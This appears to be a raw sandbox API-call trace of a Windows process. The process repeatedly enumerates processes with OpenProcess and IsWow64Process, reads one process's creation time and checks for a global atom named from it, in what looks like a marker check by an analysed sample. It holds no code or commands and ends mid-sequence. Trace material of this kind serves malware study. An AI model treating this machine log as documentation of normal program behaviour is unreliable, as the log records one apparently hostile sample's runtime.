	[0104.346] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.346] CloseHandle (hObject=0x694) returned 1
	[0104.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.347] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.347] CloseHandle (hObject=0x694) returned 1
	[0104.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.347] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.347] CloseHandle (hObject=0x694) returned 1
	[0104.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.347] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.347] CloseHandle (hObject=0x694) returned 1
	[0104.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.347] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.347] CloseHandle (hObject=0x694) returned 1
	[0104.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.347] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.347] CloseHandle (hObject=0x694) returned 1
	[0104.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.348] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.348] CloseHandle (hObject=0x694) returned 1
	[0104.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.348] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.348] CloseHandle (hObject=0x694) returned 1
	[0104.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.348] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.348] CloseHandle (hObject=0x694) returned 1
	[0104.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.348] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.348] CloseHandle (hObject=0x694) returned 1
	[0104.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.349] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.349] CloseHandle (hObject=0x694) returned 1
	[0104.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.349] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.349] CloseHandle (hObject=0x694) returned 1
	[0104.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.349] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.349] CloseHandle (hObject=0x694) returned 1
	[0104.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.349] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.349] CloseHandle (hObject=0x694) returned 1
	[0104.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.350] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.350] CloseHandle (hObject=0x694) returned 1
	[0104.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.350] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.350] CloseHandle (hObject=0x694) returned 1
	[0104.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.350] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.350] CloseHandle (hObject=0x694) returned 1
	[0104.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.350] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.350] CloseHandle (hObject=0x694) returned 1
	[0104.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.350] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.350] CloseHandle (hObject=0x694) returned 1
	[0104.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.351] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.351] CloseHandle (hObject=0x694) returned 1
	[0104.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.351] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.351] CloseHandle (hObject=0x694) returned 1
	[0104.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.351] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.351] CloseHandle (hObject=0x694) returned 1
	[0104.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.352] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.352] CloseHandle (hObject=0x694) returned 1
	[0104.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.352] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.352] CloseHandle (hObject=0x694) returned 1
	[0104.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.353] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.353] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.353] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.353] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.354] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.354] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.354] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.355] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.355] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.355] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.355] CloseHandle (hObject=0x694) returned 1
	[0104.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.355] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.355] CloseHandle (hObject=0x694) returned 1
	[0104.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.355] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.355] CloseHandle (hObject=0x694) returned 1
	[0104.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.355] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.356] CloseHandle (hObject=0x694) returned 1
	[0104.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.392] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.392] CloseHandle (hObject=0x694) returned 1
	[0104.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.393] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.393] CloseHandle (hObject=0x694) returned 1
	[0104.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.393] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.393] CloseHandle (hObject=0x694) returned 1
	[0104.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.393] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.393] CloseHandle (hObject=0x694) returned 1
	[0104.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.394] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.394] CloseHandle (hObject=0x694) returned 1
	[0104.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.394] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.394] CloseHandle (hObject=0x694) returned 1
	[0104.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.394] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.394] CloseHandle (hObject=0x694) returned 1
	[0104.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.394] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.394] CloseHandle (hObject=0x694) returned 1
	[0104.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.395] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.395] CloseHandle (hObject=0x694) returned 1
	[0104.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.395] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.395] CloseHandle (hObject=0x694) returned 1
	[0104.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.395] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.395] CloseHandle (hObject=0x694) returned 1
	[0104.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.395] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.395] CloseHandle (hObject=0x694) returned 1
	[0104.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.395] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.395] CloseHandle (hObject=0x694) returned 1
	[0104.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.396] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.396] CloseHandle (hObject=0x694) returned 1
	[0104.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.396] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.396] CloseHandle (hObject=0x694) returned 1
	[0104.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.396] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.396] CloseHandle (hObject=0x694) returned 1
	[0104.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.396] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.396] CloseHandle (hObject=0x694) returned 1
	[0104.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.396] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.396] CloseHandle (hObject=0x694) returned 1
	[0104.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.397] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.397] CloseHandle (hObject=0x694) returned 1
	[0104.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.397] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.397] CloseHandle (hObject=0x694) returned 1
	[0104.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.397] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.397] CloseHandle (hObject=0x694) returned 1
	[0104.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.397] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.397] CloseHandle (hObject=0x694) returned 1
	[0104.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.397] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.397] CloseHandle (hObject=0x694) returned 1
	[0104.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.398] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.398] CloseHandle (hObject=0x694) returned 1
	[0104.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.398] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.398] CloseHandle (hObject=0x694) returned 1
	[0104.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.398] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.398] CloseHandle (hObject=0x694) returned 1
	[0104.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.398] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.398] CloseHandle (hObject=0x694) returned 1
	[0104.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.398] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.398] CloseHandle (hObject=0x694) returned 1
	[0104.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.399] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.399] CloseHandle (hObject=0x694) returned 1
	[0104.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.399] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.399] CloseHandle (hObject=0x694) returned 1
	[0104.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.399] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.399] CloseHandle (hObject=0x694) returned 1
	[0104.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.400] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.400] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.400] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.400] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.400] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.401] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.401] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.401] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.401] CloseHandle (hObject=0x694) returned 1
	[0104.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.402] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.402] CloseHandle (hObject=0x694) returned 1
	[0104.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.402] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.402] CloseHandle (hObject=0x694) returned 1
	[0104.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.402] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.402] CloseHandle (hObject=0x694) returned 1
	[0104.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.438] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.438] CloseHandle (hObject=0x694) returned 1
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.438] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.438] CloseHandle (hObject=0x694) returned 1
	[0104.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.439] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.439] CloseHandle (hObject=0x694) returned 1
	[0104.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.439] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.439] CloseHandle (hObject=0x694) returned 1
	[0104.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.439] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.439] CloseHandle (hObject=0x694) returned 1
	[0104.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.439] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.439] CloseHandle (hObject=0x694) returned 1
	[0104.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.440] CloseHandle (hObject=0x694) returned 1
	[0104.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.440] CloseHandle (hObject=0x694) returned 1
	[0104.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.440] CloseHandle (hObject=0x694) returned 1
	[0104.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.440] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.440] CloseHandle (hObject=0x694) returned 1
	[0104.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.441] CloseHandle (hObject=0x694) returned 1
	[0104.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.441] CloseHandle (hObject=0x694) returned 1
	[0104.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.441] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.441] CloseHandle (hObject=0x694) returned 1
	[0104.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.442] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.442] CloseHandle (hObject=0x694) returned 1
	[0104.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
